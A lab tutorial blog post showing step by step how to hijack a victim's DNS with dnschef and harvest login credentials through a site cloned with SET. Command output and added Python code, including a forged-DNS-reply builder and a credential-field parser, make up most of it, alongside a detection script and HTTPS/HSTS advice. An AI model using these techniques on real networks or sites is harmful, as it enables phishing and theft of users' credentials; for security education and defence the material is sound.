
Ethical Hacking Fridays: How to Hack (Part 9) DNS Hijacking and Credential Harvesting

by Ivan

Hacking through DNS hijacking and credential harvesting requires a basic understanding of how DNS works.

Below I will provide a basic introduction to this concept.

DNS Basics

DNS (Domain Name System) maps a human-readable domain name like reply.com to an IP address. Imagine having to advertise your business or browse to sites using IP addresses. It would be painful with IPv4 addressing and near unusable with IPv6. DNS resolution is essential for the Internet to work.

Your devices (desktop, laptop, tablet, phone etc.) all have DNS servers configured. For example, Google’s public DNS servers are 8.8.8.8 and 8.8.4.4.

kali@kali:~$ nslookup
> server 8.8.8.8
Default server: 8.8.8.8
Address: 8.8.8.8#53
> reply.com
Server: 8.8.8.8
Address: 8.8.8.8#53

Non-authoritative answer:
Name: reply.com
Address: 45.60.1.11
Name: reply.com
Address: 45.60.5.11

“nslookup” is a tool to test DNS resolution. If you don’t specify a DNS “server” it uses your system DNS settings, but you can override that with the “server” command. Here I point it at 8.8.8.8, Google’s primary public DNS server, then type “reply.com”, which resolves to two IPv4 addresses, 45.60.1.11 and 45.60.5.11 (both are returned and the client may use either). The IPv4 address is what routes your request from your device to the web server hosting the Reply website. That is a simplification, but at a basic level this is what happens.

Now here is the problem…

What if it were possible to hijack the client’s DNS request, so that instead of the official DNS server answering that 45.60.5.11 is the address of the web server hosting the Reply site, the client was told it is 192.168.1.2, the address of my Kali server on my LAN? That is a real problem.

The internal IP address of my Kali server isn’t publicly routable, but that doesn’t mean you couldn’t make it reachable over the Internet using a DMZ, cloud instance, VPN etc. For the purpose of this tutorial, and just to demonstrate the technique, I’m going to use my local Kali server.

If you were somehow able to gain access to the victim’s router, you could put your attacker DNS server first in the list. Provided it was up it would be queried first, with the real DNS servers only used as fallbacks (exactly when a stub resolver gives up on the first server and moves on varies by operating system, but a server that answers promptly is rarely bypassed). The victim would be none the wiser that an additional DNS server had been added, and even if they noticed, would they question it?

Think of all the home routers which still have the default login credentials printed on a sticker on the router itself! Or what if you were able to gain access to a victim’s device using an exploit discussed in my other article, “Ethical Hacking (Part 7): Metasploit Penetration Testing Framework”? There are many ways this can be done, but I’m just giving you some food for thought.

Preparation

My Kali Linux instance is running on 192.168.1.2 and my victim device is running on 192.168.1.1. I’ve updated the DNS settings on the victim device so that 192.168.1.2 is at the top of the DNS server list in the TCP/IP settings. If the victim’s device uses DHCP you could also make this change on the DHCP server (probably the router), which has the same effect. For this tutorial I want to demonstrate how seamless prepending or swapping in an attacker DNS server is. My victim device still works fine even though 192.168.1.2 is not responding yet: its requests try 192.168.1.2 first, that fails (nothing is listening there at the moment), and the resolver simply moves on to the next DNS server on the list. From the victim’s point of view nothing obvious has changed. Once the attacker’s server is up it will be answering every query, which is why the tool used below proxies everything it does not spoof to a real upstream resolver.

Hijacking DNS

We are going to use a utility called “dnschef” which is bundled with Kali Linux.

kali@kali:~$ dnschef --help
usage: dnschef [options]:

(ASCII-art banner: dnschef version 0.4, iphelix@thesprawl.org)

DNSChef is a highly configurable DNS Proxy for Penetration Testers and Malware
Analysts. It is capable of fine configuration of which DNS replies to modify
or to simply proxy with real responses. In order to take advantage of the tool
you must either manually configure or poison DNS server entry to point to
DNSChef. The tool requires root privileges to run on privileged ports.

optional arguments:
  -h, --help            show this help message and exit
  --fakedomains thesprawl.org,google.com
                        A comma separated list of domain names which will be
                        resolved to FAKE values specified in the the above
                        parameters. All other domain names will be resolved to
                        their true values.
  --truedomains thesprawl.org,google.com
                        A comma separated list of domain names which will be
                        resolved to their TRUE values. All other domain names
                        will be resolved to fake values specified in the above
                        parameters.

Fake DNS records::
  --fakeip 192.0.2.1    IP address to use for matching DNS queries. If you use
                        this parameter without specifying domain names, then
                        all 'A' queries will be spoofed. Consider using --file
                        argument if you need to define more than one IP
                        address.
  --fakeipv6 2001:db8::1
                        IPv6 address to use for matching DNS queries. If you
                        use this parameter without specifying domain names,
                        then all 'AAAA' queries will be spoofed. Consider
                        using --file argument if you need to define more than
                        one IPv6 address.
  --fakemail mail.fake.com
                        MX name to use for matching DNS queries. If you use
                        this parameter without specifying domain names, then
                        all 'MX' queries will be spoofed. Consider using
                        --file argument if you need to define more than one MX
                        record.
  --fakealias www.fake.com
                        CNAME name to use for matching DNS queries. If you use
                        this parameter without specifying domain names, then
                        all 'CNAME' queries will be spoofed. Consider using
                        --file argument if you need to define more than one
                        CNAME record.
  --fakens ns.fake.com  NS name to use for matching DNS queries. If you use
                        this parameter without specifying domain names, then
                        all 'NS' queries will be spoofed. Consider using
                        --file argument if you need to define more than one NS
                        record.
  --file FILE           Specify a file containing a list of DOMAIN=IP pairs
                        (one pair per line) used for DNS responses. For
                        example: google.com=1.1.1.1 will force all queries to
                        'google.com' to be resolved to '1.1.1.1'. IPv6
                        addresses will be automatically detected. You can be
                        even more specific by combining --file with other
                        arguments. However, data obtained from the file will
                        take precedence over others.

Optional runtime parameters.:
  --logfile FILE        Specify a log file to record all activity
  --nameservers 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
                        A comma separated list of alternative DNS servers to
                        use with proxied requests. Nameservers can have either
                        IP or IP#PORT format. A randomly selected server from
                        the list will be used for proxy requests when provided
                        with multiple servers. By default, the tool uses
                        Google's public DNS server 8.8.8.8 when running in
                        IPv4 mode and 2001:4860:4860::8888 when running in
                        IPv6 mode.
  -i 127.0.0.1 or ::1, --interface 127.0.0.1 or ::1
                        Define an interface to use for the DNS listener. By
                        default, the tool uses 127.0.0.1 for IPv4 mode and ::1
                        for IPv6 mode.
  -t, --tcp             Use TCP DNS proxy instead of the default UDP.
  -6, --ipv6            Run in IPv6 mode.
  -p 53, --port 53      Port number to listen for DNS requests.
  -q, --quiet           Don't show headers.

There are a lot of configuration options there, but the objective for this tutorial is simple: we want to hijack DNS for reply.com.

root@kali:~# dnschef --fakeip=192.168.1.2 --fakedomains=reply.com --interface=0.0.0.0

(ASCII-art banner: dnschef version 0.4, iphelix@thesprawl.org)

(16:49:36) [*] DNSChef started on interface: 0.0.0.0
(16:49:36) [*] Using the following nameservers: 8.8.8.8
(16:49:36) [*] Cooking A replies to point to 192.168.1.2 matching: reply.com

Has it worked?

I went to my victim machine and ran an “nslookup”.

% nslookup reply.com
Server: 192.168.1.2
Address: 192.168.1.2#53

Name: reply.com
Address: 192.168.1.2

% nslookup www.reply.com
Server: 192.168.1.2
Address: 192.168.1.2#53

Name: www.reply.com
Address: 192.168.1.2

Can you see that my victim machine now thinks “reply.com” resolves to 192.168.1.2 instead of 45.60.1.11 or 45.60.5.11? Note that “www.reply.com” was caught as well: dnschef matches the names you give it and their subdomains. I mean, that’s pretty disastrous.

You may be thinking, “so what?”. There is no web server running, so what difference does it make if a victim browses to a site that won’t respond because nothing is there? You would be right, and that’s why we’ll look at “setoolkit” next.

The Social-Engineer Toolkit (SET) — “setoolkit”
This is an incredibly powerful tool with loads of functionality. I encourage you to explore all it has to offer. For this tutorial I’m going to use one specific part of it: cloning a website to harvest credentials.

If this is the first time you are running “setoolkit” it will ask you to accept a disclaimer saying you are not going to use it for anything illegal.

root@kali:~# setoolkit

(SET ASCII-art banner)
                     https://www.trustedsec.com

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>
Select “1” for “Social-Engineering Attacks”.

set> 1

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set>

Then “2” for “Website Attack Vectors”.

set> 2

 The Web Attack module is a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit browser
 exploits through an iframe and deliver a Metasploit payload.

 The Credential Harvester method will utilize web cloning of a web-site that
 has a username and password field and harvest all the information posted to
 the website.

 The TabNabbing method will wait for a user to move to a different tab, then
 refresh the page to something different.

 The Web-Jacking Attack method was introduced by white_sheep, emgent. This
 method utilizes iframe replacements to make the highlighted URL link to
 appear legitimate however when clicked a window pops up then is replaced
 with the malicious link. You can edit the link replacement settings in the
 set_config if its too slow/fast.

 The Multi-Attack method will add a combination of attacks through the web
 attack menu. For example you can utilize the Java Applet, Metasploit
 Browser, Credential Harvester/Tabnabbing all at once to see which is
 successful.

 The HTA Attack method will allow you to clone a site and perform powershell
 injection through HTA files which can be used for Windows-based powershell
 exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

set:webattack>

Select “3” or “Credential Harvester Attack Method”.

set:webattack> 3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>

Select “2” for “Site Cloner”.

Please note that “setoolkit” runs its own web server. If you have Apache or NGINX running it will ask whether you want to stop the service, which you need to do for this to work (see the prompt near the end of the output below).

set:webattack> 2

[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report

--------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---

The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really
important:

If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.2]:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://reply.com

[*] Cloning the website: https://reply.com
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?

Do you want to attempt to disable Apache? [y/n]: y
Stopping apache2 (via systemctl): apache2.service.
Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.

Within seconds the Reply site has been cloned. If I open “http://192.168.1.2”, I can see the Reply site locally and the site looks exactly the same. The “setoolkit” logs look like this.

192.168.1.1 - - [18/Oct/2020 22:08:58] "GET / HTTP/1.1" 200 -
192.168.1.1 - - [18/Oct/2020 22:08:58] "GET /index.html HTTP/1.1" 200 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /style%20library/scripts/mtiFontTrackingCode.js HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340102 HTTP/1.1" 404 -
[*] WE GOT A HIT! Printing the output:
PARAM: {"Pattern":"[3,1,1,1]","Cycles":4,"Language":2,"Tags":[],"TagsInOr":true,"Sites":[1],"SortFields":["REUHomeOrderDate","REUValidityStartDate","Created"],"IsAscending":[false,false,false],"IsInHome":true,"IsInHomeSites":false,"TemplateB1":"1Block","TemplateB2":"2Block","TemplateB3":"3Block","PagingInfo1":"Paged=TRUE
PARAM: p_REUHomeOrderDate=20140603 22:00:00
PARAM: p_REUValidityStartDate=20140501 07:00:00
PARAM: p_Created=20140131 14:17:24
PARAM: p_ID=5672","PagingInfo2":"","PagingInfo3":"Paged=TRUE
PARAM: p_REUHomeOrderDate=20140825 22:00:00
PARAM: p_REUValidityStartDate=20140825 22:00:00
PARAM: p_Created=20140826 09:04:38
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340103 HTTP/1.1" 404 -
PARAM: p_ID=6728","HasMoreResults":true,"WidgetListName":"Contents","PageNumber":2,"PageUrl":"https://www.reply.com/en/SitePages/HomePage.aspx","CachePageUrl":"/en/sitepages/homepage.aspx","IsCacheActive":true,"HasFilters":false,"CacheAllWidgets":true,"IsPublicZone":true,"IsPast":false,"Title":null,"ExcludeId":[15902,20899,19155,20793,20670,20515,19773,20373,19941,19600,19258,19847,19764,19230,19314,19315,19503,19373,19081,19172,19191,18863,19162,18866,18728,18977,18687,18724,18134,17104,18654,18373,18462,18470,18231,18276,18122,17864,18206,17546,17138,16705,17153,17049,16532,15619,16618,16298,16180,16418,16272,14810,15043,13762,16279,15958,14584,14685,14194,14504,14395,13339,11709,11702,13173,11185,10736,11606,13646,10316,11577],"DateFrom":null,"DateTo":null,"Typologies":null,"PageWidgetTemplates":[[5507,15],[5516,4],[5486,4],[6171,3],[5483,3],[5478,3],[2309,4],[5998,3],[6172,3],[6203,3],[5875,3],[5890,4],[2117,3],[6405,16],[5604,3],[6196,5],[2449,4],[5749,3],[5926,3],[5956,4],[5710,3],[6019,3],[1246,4],[5794,3],[5698,3],[5716,3],[1139,4],[5941,13],[5983,4],[1044,4],[5669,4],[6142,9],[6232,3],[5995,4],[5672,4],[2116,3],[6412,3],[5475,3],[5947,4],[6495,4],[5734,4],[9187,3],[7900,4],[8464,4],[1943,3],[10015,3],[6163,4]],"Skip":0,"Topic":null,"ExtraConditions":null,"ForcedTemplateID":-1,"FirstForcedTemplateID":-1}
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
192.168.1.1 - - [18/Oct/2020 22:09:00] "POST /_layouts/15/reply.replyeu.wcm/getwidgetsasync.ashx HTTP/1.1" 302 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/menuhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2%2F&ParentIDList=76,43&_=1603055340105 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/menuhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2%2F&Mode=descendants&ParentIDList=2,8,14,21,25,29,45,34,37&_=1603055340104 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340106 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340107 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/cookiebannerhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2%2F&_=1603055340108 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_Incapsula_Resource?SWKMTFSR=1&e=0.5164617984924778 HTTP/1.1" 404 -

And in my browser it looks like this…

An absolute exact match.

Now, with “dnschef” running for “reply.com” in one terminal window and “setoolkit” still running in another, if I browse to “www.reply.com” or “reply.com” on the victim machine the site looks exactly the same. The visible tell is that the site is served over plain HTTP instead of HTTPS: next to the URL the browser says “Not Secure” and there is no padlock. The lesson is to insist on HTTPS and to treat a missing padlock on a site that normally has one as a red flag. This is also why a site that sends an HSTS header (or is on the browser’s HSTS preload list) is harder to attack this way: the browser upgrades the request to HTTPS before connecting, so the plain-HTTP clone on port 80 never gets the request.

If you have any problems make sure you clear the cache in your browser and close all browser windows and re-open them. You will need to make sure you are not retrieving a cached version in the browser.

This is good…

This is bad…

So all I have done is clone the website within seconds and although that is impressive, no credentials were harvested.

An important message when cloning the site with “setoolkit” was this.

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.

Let’s try and find a site with a login form on the landing page to try this on.

I’m going to use, “https://forums.kali.org” as it will be a nice example. It has a username and password form on the landing page so we are good to go.

In one Kali Linux terminal window I start “dnschef”. Note that giving it “kali.org” is enough to catch “forums.kali.org” as well, because dnschef also matches subdomains of the names you list.

root@kali:~# dnschef --fakeip=192.168.1.2 --fakedomains=kali.org --interface=0.0.0.0

In another Kali Linux terminal window I clone the site with “setoolkit”.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.2]:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://forums.kali.org

[*] Cloning the website: https://forums.kali.org
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

I check on my victim machine and DNS for forums.kali.org is resolving to 192.168.1.2.

% nslookup forums.kali.org
Server: 192.168.1.2
Address: 192.168.1.2#53

Name: forums.kali.org
Address: 192.168.1.2
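To make the two things dnschef just did concrete (answering “reply.com” and “www.reply.com” with one rule earlier, and “forums.kali.org” from a rule for “kali.org” here), the following is an added example written for this page; it is not dnschef’s code and not part of the original post. It parses an A query from raw DNS wire bytes, applies a right-to-left label comparison so that a listed domain also covers its subdomains, and builds the forged reply; anything that does not match is returned as None, which is the point at which a tool like dnschef would proxy the query to its real upstream nameserver. The fake mapping, the transaction ID and the TTL are assumptions, and the query packet is constructed in the code so it runs offline without opening a socket.

```python
"""Model of the selective DNS spoofing dnschef performs.

Added example, not part of the original post and not dnschef's own code.
Runs offline on a constructed query packet; no sockets are opened.
"""
import ipaddress
import struct

# Assumption: the same fake mapping the tutorial configured on the command line.
FAKE_DOMAINS = {"kali.org": "192.168.1.2"}


def matches_fake_domain(qname, fake_domains):
    """Return the fake IP if qname equals, or is a subdomain of, a fake domain.

    Labels are compared from the right, so 'forums.kali.org' matches 'kali.org'
    while 'notkali.org' and 'kali.org.example' do not.
    """
    qlabels = qname.lower().rstrip(".").split(".")
    for domain, ip in fake_domains.items():
        dlabels = domain.lower().rstrip(".").split(".")
        if len(qlabels) >= len(dlabels) and qlabels[-len(dlabels):] == dlabels:
            return ip
    return None


def encode_name(name):
    """Encode 'a.b.c' as DNS wire-format labels terminated by a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(data, offset):
    """Decode an uncompressed wire-format name; return (name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            # Compression pointers never appear in the question a stub resolver sends.
            raise ValueError("compressed name in question section")
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(name, txid=0x1234):
    """Constructed stub-resolver query: RD flag set, one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_query(packet):
    """Pull the transaction ID and the single question out of a query packet."""
    txid = struct.unpack("!H", packet[:2])[0]
    name, offset = decode_name(packet, 12)          # question starts after the 12-byte header
    qtype, qclass = struct.unpack("!HH", packet[offset:offset + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": packet[12:offset + 4]}


def spoof_reply(packet, fake_domains, ttl=60):
    """Forge an A answer if the query hits a fake domain, else return None (proxy it)."""
    q = parse_query(packet)
    if q["qtype"] != 1 or q["qclass"] != 1:          # only A/IN is spoofed here (like --fakeip)
        return None
    ip = matches_fake_domain(q["name"], fake_domains)
    if ip is None:
        return None
    # Flags 0x8180: response, recursion desired, recursion available, NOERROR.
    header = struct.pack("!HHHHHH", q["id"], 0x8180, 1, 1, 0, 0)
    # Answer name is a pointer (0xC00C) back to the question name at offset 12.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
    return header + q["question"] + answer


def answered_ip(reply):
    """Address carried in a reply built by spoof_reply (its final four bytes)."""
    return str(ipaddress.IPv4Address(reply[-4:]))


if __name__ == "__main__":
    for name in ("forums.kali.org", "kali.org", "reply.com", "notkali.org"):
        r = spoof_reply(build_query(name), FAKE_DOMAINS)
        print(f"{name:18} -> {answered_ip(r) if r else 'proxy upstream'}")
```

The suffix match is what makes a single “kali.org” rule cover the forum host, and it is also why an attacker rarely needs to enumerate a target’s hostnames. The reply copies the client’s transaction ID and question verbatim, which is all a stub resolver checks before accepting the answer; without DNSSEC validation there is nothing in the packet that authenticates who sent it.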

Now this is quite important. We need to make sure the victim browser does not have the original site cached, so clear the cache and close your browser windows to be sure. Then open your browser and go to “forums.kali.org”. We’ll know it has worked because the connection will be using HTTP instead of HTTPS and the browser will say “Not Secure”.

In the username and password fields on the page, I typed in “testuser” for the username and “testpass” for the password. As we aren’t really hitting the Kali forum the login will fail but we’ll see the login details in the “setoolkit” logs.

192.168.1.1 - - [18/Oct/2020 22:40:02] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: vb_login_username=testuser
POSSIBLE USERNAME FIELD FOUND: vb_login_password=
POSSIBLE PASSWORD FIELD FOUND: vb_login_password=
POSSIBLE USERNAME FIELD FOUND: vb_login_password_hint=testpass
POSSIBLE PASSWORD FIELD FOUND: vb_login_password_hint=testpass
PARAM: s=301f0571702614d88e1b330ebaa0751d
PARAM: securitytoken=guest
POSSIBLE USERNAME FIELD FOUND: do=login
POSSIBLE USERNAME FIELD FOUND: vb_login_md5password=
POSSIBLE PASSWORD FIELD FOUND: vb_login_md5password=
POSSIBLE USERNAME FIELD FOUND: vb_login_md5password_utf=
POSSIBLE PASSWORD FIELD FOUND: vb_login_md5password_utf=
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
192.168.1.1 - - [18/Oct/2020 22:40:21] "POST /login.php?s=301f0571702614d88e1b330ebaa0751d&do=login HTTP/1.1" 302 -
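The log above is worth reading closely: “vb_login_password” arrived empty, the plaintext landed in “vb_login_password_hint”, and “do=login” was reported as a possible username. The following is an added example for this page, not SET’s code, that reconstructs the classification those lines imply: a name=value pair containing “user” or “login” is a possible username field, one containing “pass” a possible password field, and everything else a plain parameter. The POST body is constructed from the field names visible in the log, and the substring rules are an assumption that reproduces the log rather than SET’s exact heuristic.

```python
"""Classify harvested POST fields the way the SET output above suggests.

Added example, not SET's code. The substring rules below are an assumption
that reproduces the tutorial's log, not SET's exact heuristic.
"""
from urllib.parse import parse_qsl

# Constructed body using the vBulletin login field names seen in the log.
SAMPLE_POST_BODY = (
    "vb_login_username=testuser&vb_login_password=&vb_login_password_hint=testpass"
    "&s=301f0571702614d88e1b330ebaa0751d&securitytoken=guest&do=login"
    "&vb_login_md5password=&vb_login_md5password_utf="
)

USERNAME_HINTS = ("user", "login")   # assumption, see module docstring
PASSWORD_HINTS = ("pass",)
USERNAME_TAG = "POSSIBLE USERNAME FIELD"
PASSWORD_TAG = "POSSIBLE PASSWORD FIELD"


def classify_fields(body):
    """Return [(name, value, [tags])] for every pair in a urlencoded body."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        pair = f"{name}={value}".lower()      # matched on name and value, so do=login is flagged
        tags = []
        if any(h in pair for h in USERNAME_HINTS):
            tags.append(USERNAME_TAG)
        if any(h in pair for h in PASSWORD_HINTS):
            tags.append(PASSWORD_TAG)
        findings.append((name, value, tags or ["PARAM"]))
    return findings


def recovered_credentials(body):
    """First non-empty username-only field and first non-empty password field.

    Takes the plaintext wherever it landed: in the log above vb_login_password
    was posted empty and the value sat in vb_login_password_hint.
    """
    username = password = None
    for name, value, tags in classify_fields(body):
        if not value:
            continue
        if username is None and USERNAME_TAG in tags and PASSWORD_TAG not in tags:
            username = value
        if password is None and PASSWORD_TAG in tags:
            password = value
    return username, password


if __name__ == "__main__":
    for name, value, tags in classify_fields(SAMPLE_POST_BODY):
        print(", ".join(tags) + ":", f"{name}={value}")
    print("recovered:", recovered_credentials(SAMPLE_POST_BODY))
```

Matching on the whole name=value pair is what produces both the useful hit (the password sitting in a “_hint” field that an exact-name match would have missed) and the noise (“do=login” flagged as a username), which is why the raw report still needs a human eye.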

At this stage you can stop “dnschef” and “setoolkit”. The victim will undoubtedly refresh; with our DNS server no longer responding, their resolver falls back to the real DNS servers, they hit the real site and are none the wiser. Keep in mind that the victim’s resolver cache may hold the forged answer until its TTL expires, so for a short time they may still be sent to 192.168.1.2 after you have stopped.

I know this must seem pretty crazy, but it goes to show how careful you need to be when using public Internet access, or even browsing to a malicious site by mistake. Everyone gets excited about free Wi-Fi when they are out, but ask yourself: can you trust it? If their Wi-Fi hands you bad DNS servers you are pretty much done for. And what if they haven’t secured their router properly and an attacker adds bad DNS servers?

It’s a good idea to have a decent virus scanner with web security to help protect against this, and to check which DNS servers your device is actually using when you are on a network you don’t control. It is really easy to fall into this trap, so be careful.
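From the defender’s side, the attack above leaves two fingerprints: a nameserver on the device that nobody sanctioned, and a public hostname resolving to a LAN address. The following is an added example for this page (not part of the original post) that applies both checks to constructed data: a resolv.conf-style list with the attacker server prepended, as in the Preparation section, and resolver log lines in an invented key=value format that mirror what the tutorial produced (reply.com and forums.kali.org answered with 192.168.1.2). The approved resolver set, the log format and the internal domain suffix are all assumptions made for the example.

```python
"""Defender-side checks for the DNS hijack shown in this tutorial.

Added example, not part of the original post. The approved resolver set,
the log format and the internal suffix are assumptions for the example.
"""
import ipaddress
import re

APPROVED_RESOLVERS = {"8.8.8.8", "8.8.4.4"}   # assumption: sanctioned resolvers
INTERNAL_SUFFIXES = (".corp.local",)          # assumption: names that legitimately resolve internally

# Constructed resolv.conf with the attacker server prepended, as in the tutorial.
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
nameserver 192.168.1.2
nameserver 8.8.8.8
nameserver 8.8.4.4
"""

# Constructed resolver log in an invented key=value format.
SAMPLE_LOG = """\
2020-10-18T22:08:58 resolver=192.168.1.2 qname=reply.com qtype=A answer=192.168.1.2
2020-10-18T22:08:58 resolver=192.168.1.2 qname=www.reply.com qtype=A answer=192.168.1.2
2020-10-18T22:09:10 resolver=8.8.8.8 qname=reply.com qtype=A answer=45.60.1.11
2020-10-18T22:40:02 resolver=192.168.1.2 qname=forums.kali.org qtype=A answer=192.168.1.2
2020-10-18T22:41:00 resolver=8.8.8.8 qname=printer.corp.local qtype=A answer=10.1.2.3
"""

LOG_RE = re.compile(r"resolver=(\S+)\s+qname=(\S+)\s+qtype=(\S+)\s+answer=(\S+)")


def unapproved_nameservers(resolv_conf, approved):
    """Nameservers, in listed order, that are not in the approved set."""
    found = []
    for line in resolv_conf.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver" and parts[1] not in approved:
            found.append(parts[1])
    return found


def is_non_global(ip):
    """True for RFC 1918, loopback, link-local and unspecified addresses."""
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_unspecified


def parse_log(text):
    """Yield one dict per log line that matches the invented format."""
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            yield dict(zip(("resolver", "qname", "qtype", "answer"), m.groups()))


def hijack_indicators(log_text, approved, internal_suffixes):
    """Return (indicator, subject, detail) tuples for suspicious log records."""
    findings = []
    for rec in parse_log(log_text):
        if rec["resolver"] not in approved:
            findings.append(("unapproved_resolver", rec["resolver"], rec["qname"]))
        # A public name answered with a LAN address is the signature of this attack;
        # names under the internal suffix are expected to resolve privately.
        if (rec["qtype"] == "A" and is_non_global(rec["answer"])
                and not rec["qname"].lower().endswith(internal_suffixes)):
            findings.append(("public_name_private_answer", rec["qname"], rec["answer"]))
    return findings


if __name__ == "__main__":
    print("unapproved nameservers:", unapproved_nameservers(SAMPLE_RESOLV_CONF, APPROVED_RESOLVERS))
    for finding in hijack_indicators(SAMPLE_LOG, APPROVED_RESOLVERS, INTERNAL_SUFFIXES):
        print(*finding)
```

The second check is the one that survives an attacker who also controls the DHCP server, because it looks at the answers rather than at who gave them; the exception list for internal names is what keeps it from paging you every time someone prints.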

I’m not showing you this so you can carry out these attacks, but to make you aware of what you are defending against and how to take the necessary precautions to be as safe as possible online.

This is the essence of ethical hacking: to understand vulnerabilities so that you can protect your network against them!
